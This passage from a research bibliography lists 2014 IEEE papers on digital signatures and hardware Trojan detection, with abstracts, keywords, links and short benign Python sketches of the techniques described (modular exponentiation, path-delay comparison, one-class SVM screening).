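    print("signature valid: created by the holder of the private key")
except InvalidSignature:
    print("signature invalid: message altered or wrong key")
```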

  • Yueying Huang; Jingang Zhang; Houyan Chen, "On The Security Of A Certificateless Signcryption Scheme," Electronics, Computer and Applications, 2014 IEEE Workshop on, vol., no., pp.664,667, 8-9 May 2014. Signcryption is a cryptographic primitive that simultaneously realizes the functions of both public key encryption and digital signature in a logically single step, at a cost significantly lower than that required by the traditional "signature and encryption" approach. Recently, an efficient certificateless signcryption scheme without bilinear pairings was proposed by Zhu et al., which is claimed secure under the assumptions that the computational Diffie-Hellman problem and the discrete logarithm problem are difficult. Although some security arguments were provided to show the scheme is secure, in this paper we find that the signcryption construction due to Zhu et al. is not as secure as claimed. Specifically, we describe an adversary that can break the IND-CCA2 security of the scheme without any Unsigncryption query. Moreover, we demonstrate that the scheme is insecure against key replacement attack by describing a concrete attack approach.
    Keywords: digital signatures; group theory; public key cryptography; Diffie-Hellman problem; IND-CCA2 security; certificateless signcryption scheme; concrete attack approach; cryptographic primitive; digital signature; discrete logarithm problem; key replacement attack; public key encryption; Computers; Encryption; Games; Public key; Receivers; Cryptography; Digital Signcryption; Key replacement attack; Security analysis (ID#:14-2090)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6845707&isnumber=6845536
  • Kishore, N.; Kapoor, B., "An Efficient Parallel Algorithm For Hash Computation In Security And Forensics Applications," Advance Computing Conference (IACC), 2014 IEEE International , vol., no., pp.873,877, 21-22 Feb. 2014. Hashing algorithms are used extensively in information security and digital forensics applications. This paper presents an efficient parallel algorithm for hash computation. It is a modification of the SHA-1 algorithm for faster parallel implementation in applications such as digital signatures and data preservation in digital forensics. The algorithm implements a recursive hash to break the chain dependencies of the standard hash function. We discuss the theoretical foundation for the work, including the collision probability and the performance implications. The algorithm is implemented using the OpenMP API, and experiments were performed using machines with multicore processors. The results show a performance gain of more than a factor of 3 when running on the 8-core configuration of the machine. (A minimal chunked-hashing sketch follows this citation.)
    Keywords: application program interfaces; cryptography; digital forensics; digital signatures; file organization; parallel algorithms; probability; OpenMP API; SHA-1 algorithm; collision probability; data preservation; digital forensics; digital signature; hash computation; hashing algorithms; information security; parallel algorithm; standard hash function; Algorithm design and analysis; Conferences; Cryptography; Multicore processing; Program processors; Standards; Cryptographic Hash Function; Digital Forensics; Digital Signature; MD5; Multicore Processors; OpenMP; SHA-1 (ID#:14-2091)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779437&isnumber=6779283
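The recursive-hash idea, hashing independent chunks in parallel and then hashing the concatenated digests, can be sketched in Python; this is a hedged illustration of the concept, not the paper's OpenMP SHA-1 modification, and the chunk size is an assumption.

```python
# A minimal chunked parallel hash: per-chunk SHA-1 digests, then a root digest.
import hashlib
from concurrent.futures import ProcessPoolExecutor

CHUNK = 1 << 20  # 1 MiB chunks (assumed)

def _sha1(chunk):
    return hashlib.sha1(chunk).digest()

def parallel_hash(data, workers=4):
    chunks = [data[i:i + CHUNK] for i in range(0, len(data), CHUNK)]
    with ProcessPoolExecutor(max_workers=workers) as pool:
        digests = list(pool.map(_sha1, chunks))         # chunks hashed independently
    return hashlib.sha1(b"".join(digests)).hexdigest()  # root over chunk digests

if __name__ == "__main__":
    print(parallel_hash(b"\x00" * (8 * CHUNK)))
```

Note that the resulting digest differs from plain SHA-1 of the whole input; both sides of a comparison must use the same chunked construction.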
  • Deepak Singh Chouhan; Mahajan, R.P., "An Architectural Framework For Encryption & Generation Of Digital Signature Using DNA Cryptography," Computing for Sustainable Global Development (INDIACom), 2014 International Conference on , vol., no., pp.743,748, 5-7 March 2014. As many modern encryption algorithms have been fully or partially broken, the world of information security looks in new directions to protect the data it transmits. The concept of using DNA computing in the field of cryptography has been identified as a possible technology that may bring forward a new hope for hybrid and unbreakable algorithms. Several DNA computing algorithms have been proposed for cryptography, cryptanalysis, and steganography problems, and they have proven very powerful in these areas. This paper gives an architectural framework for encryption and generation of digital signatures using DNA cryptography. To analyze performance, the original plaintext size and key size, together with the encryption and decryption times, are examined; experiments on plaintexts with different contents are also performed to test the robustness of the program. (A minimal DNA digital coding sketch follows this citation.)
    Keywords: Ciphers; DNA; DNA computing; Digital signatures; Encoding; Encryption; DNA; DNA computing; DNA cryptography; DNA digital coding (ID#:14-2092)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6828061&isnumber=6827395
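DNA digital coding, the usual starting point for such schemes, maps each 2-bit pair to a nucleotide. The sketch below uses one common convention (00→A, 01→C, 10→G, 11→T), which is an assumption; the paper's coding may differ.

```python
# A minimal DNA digital coding round trip: bytes -> nucleotide strand -> bytes.
ENCODE = {"00": "A", "01": "C", "10": "G", "11": "T"}  # assumed convention
DECODE = {v: k for k, v in ENCODE.items()}

def to_dna(data):
    bits = "".join(f"{byte:08b}" for byte in data)
    return "".join(ENCODE[bits[i:i + 2]] for i in range(0, len(bits), 2))

def from_dna(strand):
    bits = "".join(DECODE[base] for base in strand)
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))

strand = to_dna(b"key")
print(strand, from_dna(strand))  # round-trips back to b'key'
```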
  • Skarmeta, AF.; Hernandez-Ramos, J.L.; Moreno, M.V., "A Decentralized Approach For Security And Privacy Challenges In The Internet Of Things," Internet of Things (WF-IoT), 2014 IEEE World Forum on , vol., no., pp.67,72, 6-8 March 2014. The strong development of the Internet of Things (IoT) is dramatically changing traditional perceptions of the current Internet towards an integrated vision of smart objects interacting with each other. While in recent years many technological challenges have already been solved through the extension and adaptation of wireless technologies, security and privacy still remain the main barriers to IoT deployment on a broad scale. In this emerging paradigm, typical scenarios manage particularly sensitive data, and any leakage of information could severely damage the privacy of users. This paper provides a concise description of some of the major challenges related to these areas that still need to be overcome in the coming years for a full acceptance by all IoT stakeholders involved. In addition, we propose a distributed capability-based access control mechanism built on public key cryptography in order to cope with some of these challenges. Specifically, our solution is based on the design of a lightweight token used for access to CoAP resources, and an optimized implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) inside the smart object. The results obtained from our experiments demonstrate the feasibility of the proposal and show promise for covering more complex scenarios in the future, as well as for application in specific IoT use cases. (A minimal host-side ECDSA sketch follows this citation.)
    Keywords: Internet of Things; authorization; computer network security; data privacy; digital signatures; personal area networks; public key cryptography; 6LoWPAN; CoAP resources; ECDSA; Internet of Things; IoT deployment; IoT stakeholders; distributed capability-based access control mechanism; elliptic curve digital signature algorithm; information leakage; lightweight token; public key cryptography; security challenges; sensitive data management; user privacy; wireless technologies; Authentication; Authorization; Cryptography; Internet; Privacy; 6LoWPAN; Internet of Things; Privacy; Security; cryptographic primitives; distributed access control (ID#:14-2093)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6803122&isnumber=6803102
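A host-side sketch of the ECDSA operation the paper optimizes for constrained devices is shown below, using pyca/cryptography; the curve, payload, and library are illustrative choices (the paper's implementation runs inside the smart object itself).

```python
# Minimal ECDSA sign/verify over P-256 with pyca/cryptography.
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives import hashes
from cryptography.exceptions import InvalidSignature

device_key = ec.generate_private_key(ec.SECP256R1())  # smart object's key pair
token = b"illustrative CoAP access token payload"      # hypothetical payload

signature = device_key.sign(token, ec.ECDSA(hashes.SHA256()))
try:
    device_key.public_key().verify(signature, token, ec.ECDSA(hashes.SHA256()))
    print("token signature verified")
except InvalidSignature:
    print("verification failed")
```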
  • Trabelsi, Wiem; Selmi, Mohamed Heny, "Multi-signature Robust Video Watermarking," Advanced Technologies for Signal and Image Processing (ATSIP), 2014 1st International Conference on , vol., no., pp.158,163, 17-19 March 2014. Watermarking is a recently developed technique that currently dominates the world of security and digital processing as a means of protecting digitized commerce. The purpose of this work is twofold: first, to establish a state of the art surveying existing watermarking methods and their performance; and second, to design, implement, and evaluate a new watermarking solution that optimizes the robustness-invisibility-capacity trade-off. The proposed approach consists of applying frequency-domain watermarking based on singular value decomposition (SVD), exploiting a mosaic made from all video frames, and inserting a double signature in order to increase the watermarking algorithm's capacity. (A minimal single-frame SVD embedding sketch follows this citation.)
    Keywords: Image coding; PSNR; Robustness; Singular value decomposition; Streaming media; Watermarking; Singular Value Decomposition; invisibility; mosaic; robustness; video watermarking (ID#:14-2094)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6834597&isnumber=6834578
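A minimal single-frame sketch of SVD-domain embedding follows; the embedding strength, frame size, and use of stored side information for extraction are assumptions, and the paper's mosaic-of-frames and double-signature steps are omitted.

```python
# Embed a watermark vector into a frame's singular values, then recover it.
import numpy as np

def embed(frame, mark, alpha=0.05):
    """Additively perturb the singular values by alpha * mark."""
    U, S, Vt = np.linalg.svd(frame, full_matrices=False)
    marked = U @ np.diag(S + alpha * mark) @ Vt
    return marked, (U, S, Vt)                      # keep side info for extraction

def extract(marked, side_info, alpha=0.05):
    U, S, Vt = side_info
    S_marked = np.diag(U.T @ marked @ Vt.T)        # recover perturbed singular values
    return (S_marked - S) / alpha

rng = np.random.default_rng(1)
frame = rng.uniform(0, 255, size=(64, 64))         # stand-in for a video frame
mark = rng.integers(0, 2, size=64).astype(float)   # binary watermark
wm, side = embed(frame, mark)
print(np.allclose(extract(wm, side), mark))        # True: watermark recovered
```

Embedding in the singular values is what gives such schemes robustness: moderate distortions of the frame perturb singular values far less than individual pixels.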
  • Vollala, S.; Varadhan, V.V.; Geetha, K.; Ramasubramanian, N., "Efficient Modular Multiplication Algorithms For Public Key Cryptography," Advance Computing Conference (IACC), 2014 IEEE International, vol., no., pp.74,78, 21-22 Feb. 2014. Modular exponentiation is an important operation for cryptographic transformations in public key cryptosystems such as the Rivest-Shamir-Adleman, Diffie-Hellman, and ElGamal schemes. Computing a^x mod n and a^x * b^y mod n for very large x, y, and n is fundamental to the efficiency of almost all public key cryptosystems and digital signature schemes. To achieve a high level of security, the word length in the modular exponentiations should be significantly large. The performance of public key cryptography is primarily determined by the implementation efficiency of the modular multiplication and exponentiation. As the words are usually large, and in order to optimize the time taken by these operations, it is essential to minimize the number of modular multiplications. In this paper we present efficient algorithms for computing a^x mod n and a^x * b^y mod n. We propose four algorithms to evaluate modular exponentiation: Bit Forwarding (BFW) algorithms to compute a^x mod n, and two algorithms, Substitute and Reward (SRW) and Store and Forward (SFW), to compute a^x * b^y mod n. All the proposed algorithms are efficient in terms of time and demand only minimal additional space to store the precomputed values. These algorithms are suitable for devices with low computational power and limited storage. (A sketch of the classic binary method they build on follows this citation.)
    Keywords: digital signatures; public key cryptography; BFW algorithms; bit forwarding algorithms; cryptographic transformations; digital signature schemes; modular exponentiation; modular multiplication algorithms; public key cryptography; public key cryptosystems; store and forward algorithms; substitute and reward algorithms; word length; Algorithm design and analysis; Ciphers; Conferences; Encryption; Public key cryptography; Modular Multiplication; Public key cryptography (PKC); RSA; binary exponentiation (ID#:14-2095)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779297&isnumber=6779283
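    For context on the entry above, the baseline these algorithms improve on is binary (square-and-multiply) exponentiation, which already reduces a^x mod n to O(log x) modular multiplications. A minimal Python sketch follows; the function names are illustrative and not taken from the paper, and Python's built-in pow(a, x, n) implements the same idea.
      def mod_exp(a, x, n):
          # Binary (square-and-multiply) exponentiation: O(log x) multiplications.
          result = 1
          a %= n
          while x > 0:
              if x & 1:                  # current exponent bit is 1
                  result = (result * a) % n
              a = (a * a) % n            # square for the next bit
              x >>= 1
          return result

      def dual_mod_exp(a, x, b, y, n):
          # Naive evaluation of (a^x * b^y) mod n; the paper's SRW/SFW
          # algorithms target this form with fewer multiplications.
          return (mod_exp(a, x, n) * mod_exp(b, y, n)) % n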
  • Miyoung Jang; Min Yoon; Jae-Woo Chang, "A Privacy-Aware Query Authentication Index For Database Outsourcing," Big Data and Smart Computing (BIGCOMP), 2014 International Conference on , vol., no., pp.72,76, 15-17 Jan. 2014. Recently, cloud computing has been spotlighted as a new paradigm of database management system. In this environment, databases are outsourced and deployed on a service provider in order to reduce the cost of data storage and maintenance. However, the service provider might be untrusted, so two data security issues, data confidentiality and query result integrity, become major concerns for users. Existing bucket-based data authentication methods have the problem that the original spatial data distribution can be disclosed from the data authentication index due to unsophisticated data grouping strategies; in addition, the transmission overhead of the verification object is high. In this paper, we propose a privacy-aware query authentication index which guarantees data confidentiality and query result integrity for users. A periodic function-based data grouping scheme is designed to privately partition a spatial database into small groups and generate a signature for each group. The group signature is used to check the correctness and completeness of outsourced data when answering a range query. Performance evaluation shows that the proposed method outperforms the existing method by up to 3 times in range query processing time.
    Keywords: cloud computing; data integrity; data privacy; database indexing; digital signatures; outsourcing; query processing; visual databases; bucket-based data authentication methods; cloud computing; cost reduction; data confidentiality; data maintenance; data security; data storage; database management system; database outsourcing; group signature; periodic function-based data grouping scheme; privacy-aware query authentication index; query result integrity; range query answering; service provider ;spatial data distribution; spatial database; unsophisticated data grouping strategy; verification object transmission overhead; Authentication; Encryption; Indexes ;Query processing; Spatial databases; Data authentication index; Database outsourcing; Encrypted database; Query result integrity (ID#:14-2096)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6741410&isnumber=6741395
  • Zhenlong Yuan; Cuilan Du; Xiaoxian Chen; Dawei Wang; Yibo Xue, "SkyTracer: Towards Fine-Grained Identification For Skype Traffic Via Sequence Signatures," Computing, Networking and Communications (ICNC), 2014 International Conference on , vol., no., pp.1,5, 3-6 Feb. 2014. Skype has become a typical choice for providing VoIP service and is well-known for its broad range of features, including voice calls, instant messaging, file transfer, and video conferencing. Considering its wide use, it is essential from the viewpoint of ISPs to identify Skype flows in order to optimize network performance and forecast future needs. However, a host is likely to run multiple network applications simultaneously, which makes it much harder to classify each Skype flow exactly from mixed traffic. In particular, current techniques usually focus on host-level identification and cannot identify Skype traffic at the flow level. In this paper, we first reveal the unique sequence signatures of Skype UDP flows and then implement a practical online system named SkyTracer for precise Skype traffic identification. To the best of our knowledge, this is the first work to utilize strong sequence signatures to carry out early identification of Skype traffic. The experimental results show that SkyTracer achieves very high accuracy in fine-grained identification of Skype traffic.
    Keywords: IP networks; Internet; Internet telephony; computer network performance evaluation; digital signatures; optimisation; telecommunication traffic; transport protocols; ISP; SkyTracer; Skype UDP flow; VoIP service; fine grained Skype traffic identification accuracy; host level identification; network performance optimization; unique sequence signatures; Accuracy; Complexity theory; Educational institutions; IP networks; Information security; Payloads; Protocols; Correlation-based Approach; Flow-level Identification; Sequence Signature; Skype (ID#:14-2097)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6785294&isnumber=6785290
  • Kuzhalvaimozhi, S.; Rao, G.Raghavendra, "Privacy Protection In Cloud Using Identity Based Group Signature," Applications of Digital Information and Web Technologies (ICADIWT), 2014 Fifth International Conference on the, vol., no., pp.75,80, 17-19 Feb. 2014. Cloud computing is an emerging computing technology where costs are directly proportional to usage and demand. The same properties that make the technology advantageous are also sources of its security and privacy problems: users' data are stored on cloud servers that are not under their own control, so cloud services are required to authenticate the user. In general, most cloud authentication algorithms do not provide anonymity, and the cloud provider can track users easily. Privacy and authenticity are thus two critical issues of cloud security. In this paper, we propose a secure anonymous authentication method for cloud services using an identity-based group signature, which allows cloud users to prove that they have the privilege to access the data without revealing their identities.
    Keywords: Authentication; Cloud computing; Elliptic curve cryptography ; Privacy; Cloud; Group Signature; Identity based cryptosystem; Privacy Protection (ID#:14-2098)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814670&isnumber=6814661
  • Premnath, Amritha Puliadi; Jo, Ju-Yeon; Kim, Yoohwan, "Application of NTRU Cryptographic Algorithm for SCADA Security," Information Technology: New Generations (ITNG), 2014 11th International Conference on , vol., no., pp.341,346, 7-9 April 2014. Critical Infrastructure represents the basic facilities, services and installations necessary for functioning of a community, such as water, power lines, transportation, or communication systems. Any act or practice that causes a real-time Critical Infrastructure System to impair its normal function and performance will have debilitating impact on security and economy, with direct implication on the society. SCADA (Supervisory Control and Data Acquisition) is a control system widely used in Critical Infrastructure Systems to monitor and control industrial processes autonomously. As SCADA architecture relies on computers, networks, applications and programmable controllers, it is more vulnerable to security threats and attacks. Traditional SCADA communication protocols such as IEC 60870, DNP3, IEC 61850, or Modbus did not provide any security services. Newer standards such as IEC 62351 and AGA-12 offer security features to handle attacks on SCADA systems; however, there are performance issues with the cryptographic solutions of these specifications when applied to SCADA systems. This research is aimed at improving the performance of SCADA security standards by employing NTRU, a fast and lightweight public key algorithm, to provide end-to-end security.
    Keywords: Authentication; Digital signatures; Encryption; IEC standards; SCADA systems; AGA-12; Critical Infrastructure System; IEC 62351; NTRU cryptographic algorithm; SCADA communication protocols over TCP/IP (ID#:14-2099)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6822221&isnumber=6822158
  • Ramya, T.; Malathi, S.; Pratheeksha, G.R.; Kumar, V.D.Ambeth, "Personalized Authentication Procedure For Restricted Web Service Access In Mobile Phones," Applications of Digital Information and Web Technologies (ICADIWT), 2014 Fifth International Conference on the , vol., no., pp.69,74, 17-19 Feb. 2014. Security as a condition is the degree of resistance to, or protection from, harm. This work investigates how to secure gadgets in a way that is simple for the user to deploy yet stringent enough to deny malware intrusions into the protected circle, seeking a balance between the extremes. The dominant approach to access control today is the password or PIN, but its flaws are clearly documented. An application (to be incorporated in a mobile phone) is proposed that allows the user's gadget to serve both as a biometric capture device and as a biometric signature acquisition device, processing a multi-level authentication procedure to grant access to a specific web service of exclusive confidentiality. To evaluate the proposed procedure, a specific set of domain specifications is chosen, and the accuracy of the biometric face recognition is evaluated along with the compatibility of the developed application against different sample inputs. The results obtained compare favorably with existing devices, suiting a larger section of society and improving security over the Internet.
    Keywords: Authentication; Face recognition; Mobile communication; Performance evaluation; Servers; Smart phones; Biometric Recognition; Face Recognition; Internet; Mobile Phones; Multi-Level Authentication; Security; Web Services (ID#:14-2100)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814702&isnumber=6814661
  • Alshammari, H.; Elleithy, K.; Almgren, K.; Albelwi, S., "Group Signature Entanglement In E-Voting System," Systems, Applications and Technology Conference (LISAT), 2014 IEEE Long Island , vol., no., pp.1,4, 2-2 May 2014. In any security system, there are many security issues that are related to either the sender or the receiver of the message. Quantum computing has proven to be a plausible approach to solving many security issues such as eavesdropping, replay attack and man-in-the-middle attack. In the e-voting system, one of these issues has been solved, namely, the integrity of the data (ballot). In this paper, we propose a scheme that solves the problem of repudiation that could occur when the voter denies the value of the ballot either for cheating purposes or for a real change in the value by a third party. By using an entanglement concept between two parties randomly, the person who is going to verify the ballots will create the entangled state and keep it in a database to use it in the future for the purpose of the non-repudiation of any of these two voters.
    Keywords: digital signatures; politics; quantum computing; security of data; ballots; cheating purposes; database; e-voting system; eavesdropping; entangled state; group signature entanglement; man-in-the-middle attack; quantum computing; replay attack; security system; Authentication; Electronic voting; Protocols; Quantum computing; Quantum entanglement; Receivers; E-voting System; Entangled State; Entanglement; Quantum Computing; Qubit (ID#:14-2101)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6845186&isnumber=6845183

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Hardware Trojan Horse Detection

Hardware Trojan Horse Detection


Detection and neutralization of hardware-embedded Trojans is a difficult problem. Current research is attempting to find ways to develop detection methods and processes and to automate the process. The research presented here addresses path delay, slack removal, reverse engineering, and counterfeit prevention. These papers were presented and published in the first half of 2014.

  • Kitsos, Paris; Voyiatzis, Artemios G., "Towards a Hardware Trojan Detection Methodology," Embedded Computing (MECO), 2014 3rd Mediterranean Conference on , vol., no., pp.18,23, 15-19 June 2014. Malicious hardware is a realistic threat. It is possible to insert malicious functionality into a device as deep as the hardware design flow, long before the silicon product is manufactured. Towards developing a hardware Trojan horse detection methodology, we analyze the capabilities and limitations of existing techniques, framing a testing strategy for efficiently uncovering hardware Trojan horses in mass-produced integrated circuits.
    Keywords: Delays; Hardware; Integrated circuit modeling; Power demand; Trojan horses; Vectors; detection techniques; integrated circuits; security; hardware Trojan horses; trusted hardware (ID#:14-2102)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6862687&isnumber=6862649
  • Kumar, P.; Srinivasan, R., "Detection of Hardware Trojan In SEA Using Path Delay," Electrical, Electronics and Computer Science (SCEECS), 2014 IEEE Students' Conference on , vol., no., pp.1,6, 1-2 March 2014. Detecting hardware Trojans is a difficult task in general. The context here is that of a fabless design house that sells IP blocks as GDSII hard macros and wants to check that final products have not been infected by Trojans during the foundry stage. In this paper we analyze hardware Trojan horse insertion and detection in the Scalable Encryption Algorithm (SEA) crypto core. We inserted Trojans at different levels in the ASIC design flow of the SEA crypto core, focusing on gate-level and layout-level insertions. We chose path delays to detect Trojans at both levels in the design phase, because path delay detection is a cost-effective and efficient technique: comparing path delays makes even small Trojan circuits significant from a delay point of view. We used typical, fast, and slow 90nm libraries to estimate the efficiency of the path delay technique under different operating conditions. The experimental results show that the detection rate on payload Trojans is 100%.
    Keywords: application specific integrated circuits; cryptography; delays; invasive software; logic circuits; ASIC design flow; GDSII hard macros; IP blocks; SEA crypto; Trojan circuits; fabless design house; gate level Trojan insertions; hardware Trojan detection; hardware Trojan horses insertion; layout level Trojan insertions; path delay; payload Trojan detection rate; scalable encryption algorithm crypto; Algorithm design and analysis; Delays; Encryption; Hardware; Logic gates; Trojan horses; GDSII; HTH detection and insertion; Hardware Trojan horses (HTH); Scalable Encryption Algorithm (SEA); path delay; payload Trojan (ID#:14-2103)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6804444&isnumber=6804412
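    To illustrate the comparison principle in the Kumar and Srinivasan entry above, the Python sketch below flags paths whose measured delay exceeds a golden-reference delay by more than a process-variation margin. All names, data, and the threshold are illustrative assumptions, not the authors' tooling.
      def flag_suspect_paths(measured, golden, margin=0.05):
          # measured, golden: dicts mapping path id -> delay (ns).
          # A path is suspect if its delay grew by more than `margin`
          # (5% here), a crude stand-in for the paper's delay comparison.
          suspects = []
          for path, ref in golden.items():
              obs = measured.get(path)
              if obs is not None and obs > ref * (1.0 + margin):
                  suspects.append((path, ref, obs))
          return suspects

      golden = {"p1": 1.20, "p2": 0.95}             # hypothetical reference delays
      measured = {"p1": 1.21, "p2": 1.10}           # p2 slowed by inserted logic?
      print(flag_suspect_paths(measured, golden))   # -> [('p2', 0.95, 1.1)]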
  • Yoshimizu, Norimasa, "Hardware Trojan Detection By Symmetry Breaking In Path Delays," Hardware-Oriented Security and Trust (HOST), 2014 IEEE International Symposium on , vol., no., pp.107,111, 6-7 May 2014. This paper discusses the detection of hardware Trojans (HTs) by their breaking of symmetries within integrated circuits (ICs), as measured by path delays. Typically, path delay or side channel methods rely on comparisons to a golden, or trusted, sample. However, golden standards are affected by inter-and intra-die variations which limit the confidence in such comparisons. Symmetry is a way to detect modifications to an IC with increased confidence by confirming subcircuit consistencies within as it was originally designed. The difference in delays from a given path to a set of symmetric paths will be the same unless an inserted HT breaks symmetry. Symmetry can naturally exist in ICs or be artificially added. We describe methods to find and measure path delays against symmetric paths, as well as the advantages and disadvantages of this method. We discuss results of examples from benchmark circuits demonstrating the detection of hardware Trojans.
    Keywords: Delays; Hardware; Integrated circuits; Logic gates; Sensitivity; Transistors; Trojan horses; circuit symmetries; hardware Trojan; integrated circuits; path delay (ID#:14-2104)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6855579&isnumber=6855557
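    The symmetry-based method in the Yoshimizu entry above avoids a golden sample by comparing a chip against itself. A toy sketch follows, under the assumption that designed-symmetric path pairs should have equal delays up to measurement noise; identifiers and tolerance are illustrative.
      def symmetry_violations(delays, symmetric_pairs, tol=0.02):
          # delays: dict mapping path id -> measured delay (ns).
          # symmetric_pairs: pairs of paths designed to be symmetric.
          # Inter-die variation largely cancels because both paths sit
          # on the same chip; a large difference hints at an inserted HT.
          return [(p, q, delays[p], delays[q])
                  for p, q in symmetric_pairs
                  if abs(delays[p] - delays[q]) > tol]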
  • Ramdas, Abishek; Saeed, Samah Mohamed; Sinanoglu, Ozgur, "Slack Removal For Enhanced Reliability And Trust," Design & Technology of Integrated Systems In Nanoscale Era (DTIS), 2014 9th IEEE International Conference On , vol., no., pp.1,4, 6-8 May 2014. Timing slacks possibly lead to reliability issues and/or security vulnerabilities, as they may hide small delay defects and malicious circuitries injected during fabrication, namely, hardware Trojans. While possibly harmless immediately after production, small delay defects may trigger reliability problems as the part is being used in field, presenting a significant threat for mission-critical applications. Hardware Trojans remain dormant while the part is tested and validated, but then get activated to launch an attack when the chip is deployed in security-critical applications. In this paper, we take a deeper look into these problems and their underlying reasons, and propose a design technique to maximize the detection of small delay defects as well as the hardware Trojans. The proposed technique eliminates all slacks by judiciously inserting delay units in a small set of locations in the circuit, thereby rendering a simple set of transition fault patterns quite effective in catching parts with small delay defects or Trojans. Experimental results also justify the efficacy of the proposed technique in improving the quality of test while retaining the pattern count and care bit density intact.
    Keywords: Circuit faults; Delays; Hardware; Logic gates; Testing; Trojan horses; Wires; At-speed Testing; Hardware Trojan; Slacks; Small Delay Defects (ID#:14-2105)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6850660&isnumber=6850634
  • Chongxi Bao; Forte, D.; Srivastava, A, "On Application Of One-Class SVM To Reverse Engineering-Based Hardware Trojan Detection," Quality Electronic Design (ISQED), 2014 15th International Symposium on , vol., no., pp.47,54, 3-5 March 2014. Due to design and fabrication outsourcing to foundries, the problem of malicious modifications to integrated circuits known as hardware Trojans has attracted attention in academia as well as industry. To reduce the risks associated with Trojans, researchers have proposed different approaches to detect them. Among these approaches, test-time detection approaches have drawn the greatest attention and most approaches assume the existence of a "golden model". Prior works suggest using reverse-engineering to identify such Trojan-free ICs for the golden model but they did not state how to do this efficiently. In this paper, we propose an innovative and robust reverse engineering approach to identify the Trojan-free ICs. We adapt a well-studied machine learning method, one-class support vector machine, to solve our problem. Simulation results using state-of-the-art tools on several publicly available circuits show that our approach can detect hardware Trojans with high accuracy rate across different modeling and algorithm parameters.
    Keywords: electronic engineering computing; integrated circuit design; invasive software; learning (artificial intelligence); reverse engineering; support vector machines; Trojan-free IC identification; fabrication outsourcing; golden model; integrated circuits; one-class SVM; one-class support vector machine; reverse engineering-based hardware Trojan detection; test-time detection approach; well-studied machine learning method; Feature extraction; Integrated circuit modeling; Layout; Support vector machines; Training; Trojan horses (ID#:14-2106)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6783305&isnumber=6783285
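    One-class SVMs, as used in the Bao et al. entry above, learn a boundary around a single "normal" class. A minimal sketch assuming scikit-learn is available; the features here are random stand-ins, since extracting real features from reverse-engineered ICs is the hard part the paper addresses.
      import numpy as np
      from sklearn.svm import OneClassSVM

      rng = np.random.default_rng(0)
      clean_feats = rng.normal(0.0, 1.0, size=(200, 16))   # presumed Trojan-free ICs
      unknown_feats = rng.normal(0.6, 1.0, size=(10, 16))  # ICs to screen

      clf = OneClassSVM(kernel="rbf", nu=0.05, gamma="scale").fit(clean_feats)
      labels = clf.predict(unknown_feats)  # +1: consistent with clean; -1: outlier
      print(labels)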
  • Tehranipoor, M.; Forte, D., "Tutorial T4: All You Need to Know about Hardware Trojans and Counterfeit ICs," VLSI Design and 2014 13th International Conference on Embedded Systems, 2014 27th International Conference on , vol., no., pp.9,10, 5-9 Jan. 2014. The migration from a vertical to horizontal business model has made it easier to introduce hardware Trojans and counterfeit electronic parts into the electronic component supply chain. Hardware Trojans are malicious modifications made to original IC designs that reduce system integrity (change functionality, leak private data, etc.). Counterfeit parts are often below specification and/or of substandard quality. The existence of Trojans and counterfeit parts creates risks for the life-critical systems and infrastructures that incorporate them including automotive, aerospace, military, and medical systems. In this tutorial, we will cover: (i) Background and motivation for hardware Trojan and counterfeit prevention/detection; (ii) Taxonomies related to both topics; (iii) Existing solutions; (iv) Open challenges; (v) New and unified solutions to address these challenges.
    Keywords: hardware-software codesign; integrated circuit testing; invasive software; counterfeit IC; counterfeit detection; counterfeit electronic parts; counterfeit prevention; electronic component supply chain; hardware Trojans; horizontal business model; life-critical systems; original IC designs; system integrity; vertical business model; Awards activities; Conferences; Educational institutions; Hardware; Trojan horses; Tutorials; Very large scale integration (ID#:14-2107)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6733093&isnumber=6733066
  • Soll, Oliver; Korak, Thomas; Muehlberghuber, Michael; Hutter, Michael, "EM-based Detection Of Hardware Trojans On FPGAs," Hardware-Oriented Security and Trust (HOST), 2014 IEEE International Symposium on , vol., no., pp.84,87, 6-7 May 2014. The detectability of malicious circuitry on FPGAs with varying placement properties yet has to be investigated. The authors utilize a Xilinx Virtex-II Pro target platform in order to insert a sequential denial-of-service Trojan into an existing AES design by manipulating a Xilinx-specific, intermediate file format prior to the bitstream generation. Thereby, there is no need for an attacker to acquire access to the hardware description language representation of a potential target architecture. Using a side-channel analysis setup for electromagnetic emanation (EM) measurements, they evaluate the detectability of different Trojan designs with varying location and logic distribution properties. The authors successfully distinguish the malicious from the genuine designs and provide information on how the location and distribution properties of the Trojan logic affect its detectability. To the best of their knowledge, this has been the first practically conducted Trojan detection using localized EM measurements.
    Keywords: Clocks; Field programmable gate arrays; Hardware; Layout; Probes; Software; Trojan horses; Hardware Trojan injection; RapidSmith; Trojan placement; electromagnetic emanation; side-channel analysis (ID#:14-2108)
